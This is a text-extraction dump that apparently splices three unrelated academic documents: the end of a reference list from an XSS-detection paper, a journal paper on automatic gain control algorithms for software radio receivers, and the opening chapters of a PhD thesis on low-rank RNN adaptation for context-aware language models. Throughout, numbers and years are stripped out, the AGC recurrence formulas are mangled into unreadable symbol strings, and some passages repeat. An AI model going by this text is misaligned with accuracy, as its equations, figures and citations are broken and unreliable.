in: proceedings - th ieee international conference on high performance computing and communications, hpcc , th ieee international conference on embedded software and systems, icess and th international symposium on cyberspace safety and security. piscataway: ieee, – doi . /hpcc. . . wang r, zhu y, tan j, zhou b. . detection of malicious web pages based on hybrid analysis. journal of information security and applications : – doi . /j.jisa. . . . zhou y, wang p. . an ensemble learning approach for xss attack detection with domain knowledge and threat intelligence. computers and security : – doi . /j.cose. . . . mokbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / https://www.precisesecurity.com/articles/cross-site-scripting-xss-makes-nearly- -of-all-cyber-attacks-in- / http://dx.doi.org/ . /jips. . http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /sec. http://dx.doi.org/ . /hpcc. . http://dx.doi.org/ . /j.jisa. . . http://dx.doi.org/ . /j.cose. . . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , application of agc technology in software radio wu hejing east university of heilongjiang e-mail: wuhejing @ .com abstract—the characteristics of software radio are flexibility, openness, scalability. the hardware platform of software radio should be a general platform. this paper discusses automatic gain control(agc) technology in software radio receiver and introduces an agc algorithm applicable for dsp implement. this algorithm is tested in matlab and simulation results are provided. keywords-software radio; characteristics; agc; matlab i. introduction at present, software radio technology is widely used in wireless communication, its basic idea is to use hardware as the basic platform of wireless communication. the a/d sampling data of signals are processed by various algorithms, and various communication functions are realized by means of software. this paper discusses the automatic gain control (agc) algorithm in software radio. the function of agc is to automatically adjust the gain of the amplifier according to the strength of the input signal received. keep the output signal basically unchanged when the input signal changes in strength. an efficient agc scheme suitable for dsp operation is proposed, which has fast convergence and accurate steady-state response characteristics. moreover, it is simple to implement and can satisfy the needs of software radio system very well. ii. characteristics of software radio ( ) flexibility. software radio can be achieved by adding software modules. it's easy to add new features. it can communicate with any other radio station and act as radio frequency relay of other radio stations. ( ) openness. software radio adopts a standardized and modular structure. its hardware can be updated or expanded with the development of devices and technologies. ( ) scalability. software radio can be upgraded by loading new software. iii. architecture of software radio software radio architecture is the concrete design structure torealize the concept of software radio. it includes hardware, software and interface protocol. the design content must take into account the current situation and long-term development of wireless communication technology. 
really unifies each standard. the structure of ideal software radio is mainly composed of antenna, rf front end, broadband a/d-d/a soft converter, general and special digital signal processors and various software components. the antenna of software radio generally covers a wide frequency band. for example, mhz- ghz requires that the characteristics of each frequency band be uniform. to meet the needs of various businesses. the rf front-end mainly completes the tasks of up-conversion, filtering, power amplification and so on. receiving realizes filtering, amplification, down conversion, and other functions. after digitizing the analog signal, the processing task is completely completed by the dsp software. in order to reduce the processing pressure of general agc, a/d converter is usually used to transmit digital signals. after special digital signal processing devices, reducing data flow rate, after the signal is changed to baseband, the data is controlled. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , iv. software and hardware platform of software radio the hardware platform of software radio should be a general platform. it may not have the highest efficiency for a particular communication system. but its openness and scalability enable it to adapt to a variety of wireless communication systems. and it can be flexible to add, subtract and modify. first, the hardware structure of software radio designed by people is basically a streaming structure. this structure is similar to the logical structure of wireless communication system. so its efficiency is higher. however, because the direct coupling of each module in this structure is too close, there is a problem of pulling the trigger and moving the whole situation. based on this situation, bus architecture has been proposed. the bus structure has good openness. it is an ideal choice to realize software radio. there are many bus standards for industrial control bus. for example, isa, pci, eisa, vem and so on. isa bus and vme bus are widely used in current digital signal processing and industrial control. vem bus has more advantages than isa bus. the data of isa bus is bits. the address bus is bits. address space mb. its bus bandwidth is only a few mhz. the data width of vme bus is bits. there are address lines. the address space is gb. the bus bandwidth is tens of mhz. vem bus is designed for multi-processor system. the isa bus is a single processor bus. so vme bus is often used in software radio. software radio operates in the so-called "software bus" mode. its software structure consists of software modules with standard interfaces. each software module defines different application functions. the integrated operation can be achieved by inserting the bus. realize the complete communication function. the integrated operation mode of "software bus" requires the unification of software interface standards. improve software openness and reusability. realize online software sharing in multiple environments. applications based on java technology can work on various platform systems. java only needs to be written once. it can run anywhere. it is easy to implement function expansion and module embedding. it can realize the rapid opening of new business. java plays an important role in realizing software reusability. v. 
principle of automatic gain control by software the block diagram of the principle of automatic gain control is shown in figure .the if sampling signal x(n) is amplified by a controllable gain amplifier. the gain is a (n).the output signal y(n)= a(n)x(n),calculate the logarithmic value of the level of signal y(n).compared with reference level log(r),an error level e(n) is generated. the gain of the amplifier is continuously adjusted by negative feedback with e(n).the output log (y (n) is gradually approached to the reference level log (r) until the circuit reaches equilibrium. the parameter alpha controls the adjustment time of agc circuit, which is a constant related to time. the logarithmic and exponential operation of signal level in circuit is to make the constant of adjusting time of control circuit independent of input level. the mathematical analysis of the block diagram is as follows: figure . agc algorithm implementation principle international journal of advanced network, monitoring and controls volume , no. , the recurrence formula of magnification factor is as follows: arnxananxnaranana  ])( )[(])()([)() ( when the amplitude after passing through the if amplifier is less than r, )()( nxnar  as positive, the amplification factor increases. )(ny increases, similarly, when the magnitude is greater than r, )()( nxnar  as negative. the magnification decreases. )(ny reduce, thus small signal amplification can be realized. large signal attenuation, the signal is controlled within a certain range. suppose the input signal is )()( ncunx  aracnana  ] )[() ( )(]) ( [)( nuac c r na n  the gain after reaching a fixed state is c r ,time constant is ac the schematic diagram of agc's second scheme is as follows: figure . agc algorithm implementation principle the recursive formula is: }])()(log{}[log{)}(log{)} (log{ nxnaranana  in order to make the response time faster, before comparing with the comparative value r, the output value of the amplifier )()()( nxnany  is logarithmic before comparison. when the magnitude is less than r, })()(log{ nxna is less than }log{ r .therefore, })()(log{}log{ nxnar  is positive. the magnification becomes larger, thus, the small signal is enlarged. when the magnitude is greater than r, })()(log{ nxna is larger than }log{ r , therefore })()(log{}log{ nxnar  is negative, the amplification factor )(na decreases, thus the attenuation of large signal is realized. through the above algorithm, the small signal is enlarged, large signal attenuation. suppose the input signal is )()( ncunx  ,have }/log{] )}[(log{)} (log{ rcaanana  international journal of advanced network, monitoring and controls volume , no. , )(]) ( }[log{)}(log{ nua r c na n  as can be seen from the above formula, the gain of the stabilized signal is c r ,the time constant is approximately equal to a vi. simulation results the agc algorithm is implemented by matlab. two agc algorithms are added to the demodulation of a narrowband qpsk signal. by observing and comparing the agc output signals, the two schemes are proved to be completely feasible. the magnification becomes larger, thus, the small signal is enlarged. when the magnitude is greater than r, })()(log{ nxna is larger than }log{ r , therefore })()(log{}log{ nxnar  is negative, the amplification factor )(na decreases, thus the attenuation of large signal is realized.through the above algorithm,the simulation results of two agc schemes are shown in fig. and fig. respectively. figure . 
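A compact sketch of the two update rules just described is given below, written in Python rather than the MATLAB used in the paper. It follows the prose description: the gain rises when the scaled output level is below the reference r and falls when it is above, with the second scheme applying the same correction in the log domain so that the loop time constant does not depend on the input level. Using the instantaneous magnitude as the level estimate is a simplification made for this sketch, not a detail from the original.

```python
# Sketch of the two AGC schemes described above (not the authors' MATLAB code).
# Scheme 1 adjusts the gain linearly; scheme 2 adjusts the log-gain so the loop's
# time constant is independent of the input level.
import numpy as np

def agc_linear(x, r, alpha, a0=1.0):
    """a(n+1) = a(n) + alpha * (r - a(n) * |x(n)|)."""
    a = a0
    y = np.zeros_like(x, dtype=float)
    for n, xn in enumerate(x):
        y[n] = a * xn
        a = a + alpha * (r - a * abs(xn))
    return y

def agc_log(x, r, alpha, a0=1.0):
    """log a(n+1) = log a(n) + alpha * (log r - log(a(n) * |x(n)|))."""
    log_a = np.log(a0)
    y = np.zeros_like(x, dtype=float)
    for n, xn in enumerate(x):
        a = np.exp(log_a)
        y[n] = a * xn
        log_a = log_a + alpha * (np.log(r) - np.log(max(a * abs(xn), 1e-12)))
    return y

# Example: a constant-envelope input whose amplitude steps from 0.2 to 2.0;
# both loops drive the output level toward the reference r.
if __name__ == "__main__":
    x = np.concatenate([0.2 * np.ones(500), 2.0 * np.ones(500)])
    print(agc_linear(x, r=1.0, alpha=0.05)[[0, 499, 999]])
    print(agc_log(x, r=1.0, alpha=0.05)[[0, 499, 999]])
```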
the simulation results of agc algorithm when the input signal of the first agc scheme change - - - - - - - - - - - international journal of advanced network, monitoring and controls volume , no. , figure . the simulation results of agc algorithm when the input signal of the second agc scheme changes vii. concluding remarks since the introduction of software radio,its brand-new software value concept solves the problem of wireless standard interoperability.,then it triggered a worldwide research climax. software radio receivers, whether the signal amplitude is stable or not will affect the timing synchronization and phase synchronization recovery of the receiver. this will determine whether the signal can be received with high quality, so automatic gain control (agc) is applied to the input signal. high quality signal reception can be achieved. these two agc schemes have fast convergence and accurate steady-state response characteristics, and the algorithm is simple.it is convenient for software radio system to be realized by dsp. reference [ ] research on the practical course "software radio system design and verification" [j]. duanrui, chen zhuming, zou lin. experimental science and technology. ( ) [ ] research on sopc-based software radio system [j]. yang zhengyu, li bing. microcomputer and application. ( ) [ ] application research of radar system based on software radio technology [j]. liu xiaoping. information and computer (theoretical edition). ( ) [ ] application of software radio technology in fm transmitter design [j]. sandik.digital communication world. ( ) [ ] application of software radio technology in ship communication [j]. wang huan. strait science and technology and industry. ( ) [ ] application and development of software radio technology [j]. wang hongbo. computer programming skills and maintenance. ( ) - - - - - - - - - fig. a fig. b c©copyright aaron jaech low-rank rnn adaptation for context-aware language modeling aaron jaech a dissertation submitted in partial fulfillment of the requirements for the degree of doctor of philosophy university of washington reading committee: mari ostendorf, chair hannaneh hajishirzi noah smith program authorized to offer degree: electrical engineering university of washington abstract low-rank rnn adaptation for context-aware language modeling aaron jaech chair of the supervisory committee: professor mari ostendorf electrical engineering a long-standing weakness of statistical language models is that their performance drastically degrades if they are used on data that varies even slightly from the data on which they were trained. in practice, applications require the use of adaptation methods to adjust the predictions of the model to match the local context. for instance, in a speech recognition application, a single static language model would not be able to handle all the different ways that people speak to their voice assistants such as selecting music and sending a message to a friend. an adapted model would make its predictions conditioned on the knowledge of who is speaking and what task they are trying to do. the current standard approach to recurrent neural network language model adaptation is to apply a simple linear shift to the recurrent and/or output layer bias vector. although this is helpful, it does not go far enough. this thesis introduces a new approach to adaptation, which we call the factorcell, that generates a custom recurrent network for each context by applying a low-rank transformation. 
the factorcell allows for a more substantial change to the recurrent layer weights. different from previous approaches, the introduction of a rank hyperparameter gives control over how different or similar the adapted models should be. in our experiments on several different datasets and multiple types of context, the in- creased adaptation of the recurrent layer is always helpful, as measured by perplexity, the standard for evaluating language models. we also demonstrate impact on two applica- tions: personalized query completion and context-specific text generation, finding that the enhanced adaptation benefits both. we also show that the factorcell provides a more ef- fective text classification model, but more importantly the classification results reveal that there are important differences between the models that are not captured by perplexity. the classification metric is particularly important for the text generation application. table of contents page list of figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iii list of tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v chapter : introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . key contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . thesis overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . general language modeling background . . . . . . . . . . . . . . . . . . . . . neural language modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . language model adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : exploring context-aware rnns . . . . . . . . . . . . . . . . . . . . . . additive bias adaptation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . models . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . comparison to related work . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : factor cell model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . factorcell model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments with different contexts . . . . . . . . . . . . . . . . . . . . . . . analysis for sparse contexts . . . . . . . . . . . . . . . . . . . . . . . . . . . i . comparison to related work . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : personalized query auto-completion . . . . . . . . . . . . . . . . . . . . background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
chapter : context-specific text generation . . . . . . . . . . . . . . . . . . . . . . text generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . illustrative examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . experiments and analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . chapter : conclusions and future directions . . . . . . . . . . . . . . . . . . . . . summary of contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . future directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . appendix a: sparse corrections for output layer adaptation . . . . . . . . . . . . a. sparse plus low-rank softmax bias adaptation . . . . . . . . . . . . . . . . . a. l penalty for bias layer fine-tuning . . . . . . . . . . . . . . . . . . . . . a. summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ii list of figures figure number page . usage of the terms “black friday” and “super bowl” on reddit during an eight year time period. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . vocabulary size in large vocabulary continuous speech recognition systems over time. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . the value of the dimension of the lstm hidden state in an unadapted model that is the strongest indicator for spanish text for three different code-switched tweets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . illustration of the factorcell architecture. . . . . . . . . . . . . . . . . . . . . accuracy vs. perplexity for different classes of models on the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . log likelihood ratio between a model that assumes a star review and the same model that assumes a star review. blue indicates a higher star likelihood and red is a higher likelihood for the star condition. . . . . . . . . accuracy vs. perplexity for different classes of models on the two character- based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . comparison of the effect of lstm parameter count and factorcell rank hy- perparameters on perplexity for dbpedia. . . . . . . . . . . . . . . . . . . . . distribution of a pca projection of hotel embeddings from the tripadvisor factorcell model showing the grouping of the hotels by city. . . . . . . . . . . distribution of a pca projection of the hotel embeddings from the tripad- visor factorcell model showing the grouping of hotels by class. . . . . . . . . . perplexity versus mrr on the development data for different classes of models. . relative improvement in mrr over the unpersonalized model versus queries seen using the large size models. plot uses a moving average of width to reduce noise. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . mrr by prefix and query lengths for the large factorcell and unadapted models with the first queries per user excluded. . . . . . . . . . . . . . . . iii . context classification accuracy versus generation context-specificity for each type of adaptation on the yelp data. . . . . . . . . . . . . . . . . . . . . . . . plot of factorcell rank and perplexity against generation context-specificity accuracy for factorcell models on the yelp restaurant data. . . . . . . . . . 
context-specificity of hotel class versus factorcell rank and perplexity in gen- erated reviews using the models learned on the tripadvisor data. . . . . . . . context classification accuracy versus generation context-specificity for each type of adaptation on the tripadvisor data. . . . . . . . . . . . . . . . . . . iv list of tables table number page . example use cases for language model adaptation . . . . . . . . . . . . . . . . approaches to rnn language model adaptation in prior work. the x indicates the use of the concatcell (cc) or the softmaxbias (sb) adaptation strategy . number of sentences, vocabulary size and context variables for the three corpora. . summary of key hyperparamters . . . . . . . . . . . . . . . . . . . . . . . . . perplexities and classification avg. aucs for reddit models . . . . . . . . . . nearest neighbors to selected subreddits in the context embedding space. . . . comparison of perplexities per subreddit . . . . . . . . . . . . . . . . . . . . . results on twitter data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . results on the scotus data in terms of perplexity and classification accuracy (acc) for the justice identification task. . . . . . . . . . . . . . . . . . . . . . perplexities for different combinations of context variables on the scotus corpus. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts. . . . . . . . . . . . . . . . . . . . . dataset statistics: dataset size in words (* or characters) of train, dev and test sets, vocabulary size, number of training documents, and context variables. . selected hyperparameters for each dataset. when a range is listed it means that a different values were selected for the factorcell, concatcell, soft- maxbias or unadapted models. . . . . . . . . . . . . . . . . . . . . . . . . . . perplexity and classification accuracy on the test set for the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . perplexity and classification accuracies for the eurotwitter and geotwitter datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . the top boosted words in the softmax bias layer for different context settings in a factorcell model. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v . top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. . . . . . . . . . . . . . . . . . . . . mrr reported for seen and unseen prefixes for small (s) and big (b) models. . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. . . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. . . . . . . . . the five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . top completions for the sentence “my boyfriend and i ate here and !” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . . 
top completions for the sentence “this was my first time coming here and the food was ” after conditioning on each star rating. . . . . . . . top completions for the sentence “i will again” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the yelp data. . . . . . . . . . . . . . . automatically judged generation accuracy, mean absolute deviation (mad), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the tripadvisor data. . . . . . . . . . a. perplexity on the validation set of models with no adaptation and varying softmax adaptation strategies. results are not comparable to those in chapter because of a difference in vocabulary size. . . . . . . . . . . . . . . . . . . vi acknowledgments first, i would like to thank my advisor prof. mari ostendorf for her excellent men- torship and for her constant encouragement, patience, and support. i have had the pleasure of working with her on many projects during the last five years and in each case her deep experience has been a valuable asset. i would also like to thank the other members of my thesis committee, hannaneh hajishirzi and noah smith, with whom i have had the pleasure of collaborating. my peers and colleagues at the university of washington have played a key role in my graduate experience. my interactions with them has been the most enjoyable part of my graduate education. i would like to thank ji he, hao fang, vicky zay- ats, yi luan, hao cheng, trang tran, kevin lybarger, farah nadeem, rik koncel- kedziorski, and shobhit hathi. i am very fortunate to have been able to work along- side these students. i thank arjun sondhi for the many fruitful discussions. i am grateful to the mentors i had during my internships, including henry schnei- derman, larry heck, eric ringger, and hetunandan kamisetty. each of them taught me important research skills and changed my perspective on the field. this thesis would not have been possible without the experience i gained from working with them. i thank my parents jeff and rebecca jaech, who have given me their unwavering support, unconditional love, and constant encouragement during all my many years of schooling. lastly, i acknowledge my lovely girlfriend gayoung park, who understands the struggles of a ph.d student and who has spent many long days and late nights vii working by my side. i thank her for her help and for reminding me to always have fun. viii chapter introduction . overview language is a highly adaptable means of communication and as humans we routinely vary our usage of it to match our environment. changes in language from one setting to another can include large differences in topic, register, politeness, etc. depending on a host of vari- ables such as the social context, the medium of communication, the time and location, and the task at hand. if statistical language models can be made to mimic this contextual adapt- ability, then they will be useful in a wider range of applications, including speech recognition, machine translation, abstractive summarization, text generation, and more. without context awareness, static models are incredibly brittle, meaning they are “ex- tremely sensitive to changes in the style, topic, or genre” (rosenfeld, ). 
performance drastically degrades when a model is used in a context other than the one for which it was trained. an early study looked at incorporating text from the associated press for modeling contemporaneous articles from the wall street journal (rosenfeld, ). even though the difference in style between two american news organizations is relatively minor compared to the variations in language that are likely to be observed in other applications, the associated press text was practically useless for this task. unfortunately, it is often the case that there is a limited amount of text available for learning a language model to characterize a particular context. therefore, researchers have long sought ways to more effectively use different sources of data. this area of research is often referred to as domain adaptation, characterized by making use of data from multiple contexts to target a particular context. domain adaptation has been explored for a wide variety of contexts, as shown in table . . as an illustration of the importance of context, figure . : usage of the terms “black friday” and “super bowl” on reddit during an eight year time period. figure . shows the bursty variation of the frequency of two terms in eight years of text from reddit. mentions of these two events increase in likelihood by several orders of magnitude during predictable but narrow windows of time. this illustrates both why models that ignore context are brittle and why there is so much to be gained from adaptation. context is often represented by partitioning data into in-domain and out-of-domain sets. the in-domain data is considered to be sampled from the same or a similar distribution as the evaluation data and the out-of-domain data is everything else. a simple adaptation method is to build separate models for the in-domain corpus and out-of-domain corpora and then choose the interpolation weights to give the best performance on the in-domain data. there can be multiple out-of-domain corpora that are treated separately but typically no attempt is made to model the similarities or differences between domains/contexts. the problem with this adaptation approach is that the notions of discrete domains are much too crude when the goal is to mimic the fine-grained contextual adaptations that humans typically employ. category purpose topic adjust to variations in topic across documents or in speech. this is the most popular use case for adaptation techniques. temporal changing language usage patterns over time (rosenfeld, ; os- borne et al., ; yogatama et al., ) geographic variations in speaking style in different geographic regions (eisenstein et al., ; chelba et al., ; halpern et al., ) modality adapt a model trained on written text for use in conversational speech (bulyko et al., ; jaech and ostendorf, ; mendels et al., ) language share information between similar languages (ragni et al., ; östling and tiedemann, ) tv programs & youtube channels adapt to styles and topics of different television shows (chen et al., ; deena et al., ) lectures, talks, & meetings use text from slides, lecture titles, and other written materials to bias language model in speech recognition (schwarm et al., ; glass et al., ; hsu and glass, ; hoang et al., ) dialog state generate an appropriate response given the dialog state (riccardi and gorin, ; liu and lane, ) personalization match the model predictions to the style of each individual from a large group (tseng et al., ; li et al., ) table . 
in the newspaper example, instead of relying solely on a single binary variable indicating domain membership (ap vs. wsj), additional contextual variables could have been used. for example, we could have a variable to indicate which section of the paper the article appeared in, or who the author was, or the date of publication. in general, the context representation can leverage multiple discrete and continuous variables; the more expressive the contextual representation, the greater the ability of the model to adapt to it. ideally, a context-aware language model could model text using the style of one newspaper and the topic of a different publication. while researchers have tried to do this with class language models, equating word class sequences with style, many real-world applications are best characterized by interacting combinations of several contextual factors. therefore, this thesis investigates models that can use rich context representations.
language is often produced in association with some information about its context. for example, in speech recognition, if a user is speaking to a personal assistant then the system might know the time of day or the identity of the task that the user is trying to accomplish. if the user takes a picture of a sign to translate it with their smart phone, the system would have contextual information related to the geographic location and the user's preferred language. the probability of certain terms and phrases appearing can change dramatically with respect to geographic location (chelba and shazeer, ).
when adapting to context information, the language model conditions on both the context and the previous words in the sequence. it is computing $p(w_{1:N} \mid \text{context})$. the mechanism for computing $p(w_{1:N})$ impacts the approach for accounting for context. recurrent neural networks (rnns) have been shown to be very effective language models compared to previous approaches such as n-gram models or maximum entropy models (mikolov et al., ), in part because they are able to make use of arbitrarily long word histories. rnn based language models are the focus of this thesis due to their recent successes and current widespread use. improvements in adapting rnns are likely to have a positive impact on multiple tasks. in addition, the continuous-space approach is well-suited to characterizing multiple contextual variables.
the standard method of adapting rnn language models is due to mikolov and zweig ( ) and involves learning an embedding to represent the context (originally the output of a topic model, but any type of learned embedding will work) and including it via concatenation as an additional input to the model. we refer to this method of adapting the recurrent layer as the concatcell because of its reliance on concatenation of the context embedding. as we will show later on, when using this adaptation method most of the parameters of the model are static with respect to context. we propose a more powerful mechanism for using a context vector, which we call the factorcell. rather than simply using context as an additional input, it is used to control a factored (low-rank) transformation of the recurrent layer weight matrix. the motivation is that allowing a greater fraction of the model parameters to be adjusted in response to the input context will produce a model that is more adaptable and responsive to that context.
in addition, we introduce a mechanism for handling new contexts that emerge after the model has been trained and deployed, showing how adaptation can be effective in these scenarios as well.

. key contributions

the primary goal of this work is to increase the adaptability of recurrent neural network language models. our main contribution is to propose a novel mechanism, which we call the factorcell, for using a context embedding vector to transform the weights of the recurrent layer. this is a fundamentally different way of adapting the recurrent layer. instead of viewing context as an additional input to the rnn, we create a function that uses context information to output the weights of a custom rnn that matches the given context. moreover, by using precomputation and caching techniques, the factorcell delivers superior adaptation at little to no extra computational cost.
we demonstrate the superiority of the factorcell model over commonly used methods for rnn adaptation, including several recent approaches that do not adapt at the recurrent layer, preferring to focus on the output bias vector. experiments on nine datasets with varying domains, contexts, and model and vocabulary sizes confirm that adapting the recurrent layer always helps. we also show that our model beats the current standard method of adapting the recurrent layer. the extensive experimentation leads to some useful observations for predicting when context conditioning will be more or less successful for a given dataset.
the many prior use cases for adaptation mentioned in section .  all have in common the requirement that all contexts be known during training. another contribution is to introduce an online learning method for adapting to contexts that emerge after the model has been deployed. online learning improves the quality of the adaptation and also widens the set of possible applications. we use a personalized query auto-completion task to demonstrate how this method can be successfully used. again, our factorcell model beats the standard approach to adaptation and the performance gap widens as more data becomes available over time.
adaptation is vital for language models to work in real world applications. we show how the factorcell model impacts multiple applications and discuss potential implications for many more. the first application is the just mentioned personalized query completion. another important application is context-specific or controllable text generation. we show how the factorcell model is significantly more controllable than the standard adaptation methods. the gap between our model and the standard approach is not easily closed even when we give the baseline an advantage by doubling the dimensionality of its recurrent layer. automatic evaluation of context-specific text generation can be difficult. we propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. for both the query completion and text generation applications we show through analysis that the factorcell model has qualitative benefits that are not fully captured by perplexity as an evaluation criterion.

. thesis overview

the remainder of the thesis proceeds as follows. in chapter , we provide background information on language modeling and adaptation.
we review relevant prior work in these areas, including the concatcell and softmaxbias models from mikolov and zweig ( ) that serve as the principal baselines for the rest of the thesis. in chapter , we show that the concatcell model is effectively a constant additive bias in the recurrent layer. we then explore trade-offs of different architectures for adapting at the recurrent layer and the output layer. we make some observations about what factors make a dataset more or less amenable to adaptation. in chapter , we introduce the factorcell, a more powerful model for rnn adaptation. by controlling the rank of a low-rank context-dependent weight transformation, the factorcell can be adjusted to allow for more or less sharing of information between contexts depending on the situation. this model remedies the prominent weakness of the concatcell, namely, that it often does not allow its predictions to be changed enough in response to context. we show that the factorcell beats the concatcell in terms of perplexity and that it also does better at capturing the relationship between context and language in text classification experiments. in chapter , we introduce an approach for adapting to new contexts that emerge after the model has been trained and deployed, and apply the factorcell model to the task of personalized query auto-completion. the key result is that stronger adaptability at the recurrent layer enables the model to better take advantage of information from new users' query histories to personalize their predictions. chapter  deals with the use of language model adaptation for context-specific text generation. we measure context-specificity by checking if the text sampled from or generated by the model matches the properties of the specified context. we show that when the adaptation is weaker (as in the concatcell) then context-specificity suffers; the factorcell model gives clear wins for context-specificity. we propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. finally, chapter  concludes the thesis by summarizing the contributions and suggesting future directions for additional research.

chapter  background

this chapter gives the necessary background information on language modeling and prior literature on adaptation. the contributions of the thesis build on these ideas.

. general language modeling background

language models compute a probability distribution over word sequences $w_{1:N}$ where each $w_i$ is drawn from a vocabulary $V$. typically, the probability is factored using the chain rule: $p(w_{1:N}) = p(w_1) \prod_{i=2}^{N} p(w_i \mid w_{1:i-1})$. the $w_{1:i-1}$ term is often referred to as the history. dealing with data sparseness is fundamental to language modeling because there will always be many valid word sequences that are not observed in the training data. one way to categorize language models is to look at how they deal with the sparseness or generalization problem: n-gram models use a back-off strategy, maximum entropy models rely on regularization techniques, and the different classes of neural networks generalize by finding low dimensional continuous space representations of language.
in the basic n-gram language model only the most recent $n-1$ words from the history are considered (bahl et al., ). in the common case that $n = 3$, known as a trigram model, $p(w_i \mid w_{1:i-1})$ is approximated as $p(w_i \mid w_{i-2}, w_{i-1})$. even with this simplifying assumption, sparseness is a problem.
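to make the trigram factorization and the sparseness issue concrete, the following is a minimal, self-contained python sketch (the toy corpus and function names are illustrative, not taken from the thesis): it estimates trigram probabilities by maximum likelihood and shows that any trigram absent from the training data receives probability zero.

```python
# Maximum-likelihood trigram estimation, illustrating the Markov approximation
# p(w_i | w_{1:i-1}) ~= p(w_i | w_{i-2}, w_{i-1}) and the sparseness problem:
# unseen trigrams get probability zero and need smoothing/back-off.
from collections import Counter

corpus = [
    "the service was great".split(),
    "the food was great".split(),
    "the food was cold".split(),
]

trigram_counts, bigram_counts = Counter(), Counter()
for sent in corpus:
    padded = ["<s>", "<s>"] + sent + ["</s>"]
    for i in range(2, len(padded)):
        trigram_counts[tuple(padded[i - 2:i + 1])] += 1
        bigram_counts[tuple(padded[i - 2:i])] += 1

def p_mle(word, history):
    """p(word | history) by relative frequency; history is a 2-tuple of words."""
    denom = bigram_counts[history]
    return trigram_counts[history + (word,)] / denom if denom else 0.0

print(p_mle("great", ("food", "was")))   # 0.5, observed in training
print(p_mle("spicy", ("food", "was")))   # 0.0, unseen trigram -> needs smoothing
```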
estimating the parameters of an n-gram language model using maximum likelihood fails to assign proper estimates to the n-grams that are unobserved in the training data, and there will be many such n-grams. the remedy is to borrow from the probability mass given to some of the observed n-grams and distribute it to unobserved ones (katz, ). the redistribution is done recursively, reducing the size of the n-gram history in each step. the methods used for back-off smoothing have been improved over time (kneser and ney, ), but the basic idea has remained the same. one improvement was to add skip-grams, which are like n-grams except they can skip over some words to look farther back in the history (siu and ostendorf, ; shazeer et al., ). a variant of skip-grams is to identify long range triggers such as by using information from a syntactic parse (bellegarda, ).
